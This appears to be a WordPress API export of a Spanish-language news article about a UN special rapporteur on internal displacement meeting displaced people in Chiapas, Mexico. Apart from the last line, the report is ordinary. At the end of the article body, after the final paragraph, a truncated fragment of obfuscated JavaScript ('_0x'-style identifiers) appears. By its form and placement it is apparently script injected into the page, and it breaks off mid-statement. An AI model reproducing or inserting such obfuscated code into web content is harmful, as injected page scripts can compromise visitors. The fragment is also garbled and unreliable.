{"id":4836,"date":"2022-09-05T01:22:01","date_gmt":"2022-09-05T01:22:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4836"},"modified":"2022-09-05T01:22:02","modified_gmt":"2022-09-05T01:22:02","slug":"relatora-cecilia-jimenez-de-la-onu-se-reune-con-desplazados-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4836","title":{"rendered":"Relatora Cecilia Jim\u00e9nez de la ONU, se re\u00fane con desplazados de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-04-at-11.22.58-AM-768x1024.jpeg\" alt=\"\" class=\"wp-image-4837\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-04-at-11.22.58-AM-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-04-at-11.22.58-AM-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-04-at-11.22.58-AM.jpeg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- V\u00edctimas de desplazamientos forzados de distintas comunidades de Chiapas se reunieron en San Crist\u00f3bal, con la Cecilia Jim\u00e9nez-Damary, Relatora Especial sobre los&nbsp; Desplazamientos Forzados Internos de la Organizaci\u00f3n de las Naciones Unidas (ONU).<\/p>\n\n\n\n<p>Al respecto, Luis Alonso Abarca Gonz\u00e1lez, &nbsp;del Comit\u00e9 de Derechos Humanos de Base de Chiapas Digna Ochoa, inform\u00f3 que la relatora se reuni\u00f3 el pasado s\u00e1bado de 11:30 a 13:00 horas en la Ciudad de San Crist\u00f3bal de Las Casas, donde sostuvieron pl\u00e1ticas y testimonios de desplazamientos arbitrarios en Chiapas.<\/p>\n\n\n\n<p>\u201cOmitimos se\u00f1alar los testimonios y las comunidades que participaron por ser un procedimiento confidencial conforme a los Est\u00e1ndares Internacionales de los Derechos Humanos\u201d, dijo.<\/p>\n\n\n\n<p>Como Comit\u00e9 Digna Ochoa, &nbsp;manifest\u00f3 su preocupaci\u00f3n por el mensaje que el gobierno de M\u00e9xico env\u00eda, \u201cal enviar una iniciativa preferente para que la GN sea formalmente parte del ej\u00e9rcito, la cual fue aprobada durante su visita\u201d.<\/p>\n\n\n\n<p>Abarca Gonz\u00e1lez indic\u00f3 que como enlace con el equipo t\u00e9cnico de la Relatora y de la Oficina en M\u00e9xico del Alto Comisionado de las Naciones Unidas para los Derechos Humanos, se acompa\u00f1\u00f3 del abogado Tzeltal Marcos P\u00e9rez L\u00f3pez, responsable del \u00c1rea Jur\u00eddica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- V\u00edctimas de desplazamientos forzados de distintas comunidades de Chiapas se reunieron en San Crist\u00f3bal, con la Cecilia Jim\u00e9nez-Damary, Relatora Especial sobre los&nbsp; Desplazamientos Forzados Internos de la Organizaci\u00f3n de las Naciones Unidas (ONU). Al respecto, Luis Alonso Abarca Gonz\u00e1lez, &nbsp;del Comit\u00e9 de Derechos Humanos de Base de Chiapas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-4836","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas","category-portada"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4836"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4836\/revisions"}],"predecessor-version":[{"id":4838,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4836\/revisions\/4838"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4837"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}